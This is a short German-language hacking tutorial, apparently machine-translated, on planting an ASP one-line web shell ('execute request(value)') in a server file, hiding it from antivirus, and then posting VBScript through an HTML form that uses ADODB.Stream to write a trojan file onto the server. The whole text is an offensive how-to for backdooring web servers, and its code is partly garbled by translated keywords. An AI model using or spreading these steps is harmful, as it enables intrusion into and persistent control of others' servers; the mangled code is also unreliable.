Dieser Code wird im Allgemeinen nicht von Viren überprüft, und die Datei ist relativ klein und nicht leicht zu vermuten. Sie kann zum Zweck des Versteckens zuerst in die ASP-Datei geschrieben werden, z. B. <%execute request (Wert)% >Code
Wenn Sie es ausblenden möchten, müssen Sie einige if-Urteilsanweisungen hinzufügen.
Dann schreiben Sie vor Ort ein Formular
Kopieren Sie den Codecode wie folgt:
<form action=http://***.com/jb51.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject(Adodb.Stream)
lP.Öffnen
lP.Type=2
lP.CharSet=gb2312
lP.writetext-Anfrage (Hackbin)
lP.SaveToFile server.mappath(men.asp),2
lP.Schließen
setze lP=nichts
Response.redirect men.asp
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>Fügen Sie den Inhalt hinzu, um das Trojanische Pferd zu generieren</textarea><BR><center><br> <input type=submit value=submit>
Speichern Sie es als HTM-Datei, ersetzen Sie http://***.com/jb51.asp durch die von Ihnen eingefügte Datei <%execute request(value)%> und klicken Sie dann auf Senden, um direkt zum Trojaner zu springen